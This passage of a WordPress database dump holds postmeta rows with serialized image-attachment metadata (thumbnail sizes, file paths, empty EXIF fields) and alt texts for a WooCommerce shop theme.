6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(763,4235,'_wp_attached_file','2018/01/product4-gallery3-1.jpg'),(764,4235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:31:\"2018/01/product4-gallery3-1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"product4-gallery3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"product4-gallery3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"product4-gallery3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(765,3236,'_wp_attached_file','2018/02/h3-slide1-graphic-brush.png'),(766,3236,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:678;s:6:\"height\";i:299;s:4:\"file\";s:35:\"2018/02/h3-slide1-graphic-brush.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-300x299.png\";s:5:\"width\";i:300;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-600x265.png\";s:5:\"width\";i:600;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-300x132.png\";s:5:\"width\";i:300;s:6:\"height\";i:132;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-630x299.png\";s:5:\"width\";i:630;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-550x299.png\";s:5:\"width\";i:550;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-550x299.png\";s:5:\"width\";i:550;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-300x299.png\";s:5:\"width\";i:300;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-600x265.png\";s:5:\"width\";i:600;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"h3-slide1-graphic-brush-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(767,144,'_wp_attached_file','2018/01/about-us-gallery-img-3.jpg'),(768,144,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:301;s:6:\"height\";i:451;s:4:\"file\";s:34:\"2018/01/about-us-gallery-img-3.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-3-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-3-301x300.jpg\";s:5:\"width\";i:301;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(769,4236,'_wp_attached_file','2018/01/about-us-gallery-img-3-1.jpg'),(770,4236,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:301;s:6:\"height\";i:451;s:4:\"file\";s:36:\"2018/01/about-us-gallery-img-3-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"about-us-gallery-img-3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-3-1-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-3-1-301x300.jpg\";s:5:\"width\";i:301;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-3-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"about-us-gallery-img-3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(771,1536,'_wp_attachment_image_alt','a'),(772,862,'_wp_attachment_image_alt','o'),(773,2170,'_wp_attachment_image_alt','a'),(774,2171,'_wp_attachment_image_alt','a'),(775,1547,'_wp_attached_file','2018/01/h7-img-4.jpg'),(776,1547,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:20:\"2018/01/h7-img-4.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-4-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-4-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-4-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(777,863,'_wp_attached_file','2018/01/h5-img-5.jpg'),(778,863,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:358;s:6:\"height\";i:450;s:4:\"file\";s:20:\"2018/01/h5-img-5.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-5-239x300.jpg\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h5-img-5-358x300.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h5-img-5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h5-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(779,2173,'_wp_attached_file','2018/01/product-5.jpg'),(780,2173,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-5.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-5-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-5-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-5-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-5-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-5-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-5-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-5-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(781,2171,'_wp_attachment_image_alt','a'),(782,2173,'_wp_attachment_image_alt','a'),(783,861,'_wp_attachment_image_alt','o'),(784,862,'_wp_attachment_image_alt','o'),(785,863,'_wp_attachment_image_alt','o'),(786,4234,'_wp_attachment_image_alt','a'),(787,145,'_wp_attached_file','2018/01/about-us-gallery-img-5.jpg'),(788,145,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:451;s:4:\"file\";s:34:\"2018/01/about-us-gallery-img-5.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-5-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-5-580x300.jpg\";s:5:\"width\";i:580;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-5-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-5-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(789,4237,'_wp_attached_file','2018/01/about-us-gallery-img-5-1.jpg'),(790,4237,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:451;s:4:\"file\";s:36:\"2018/01/about-us-gallery-img-5-1.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-580x300.jpg\";s:5:\"width\";i:580;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(791,2175,'_wp_attached_file','2018/01/product-6.jpg'),(792,2175,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-6.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-6-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-6-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-6-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\"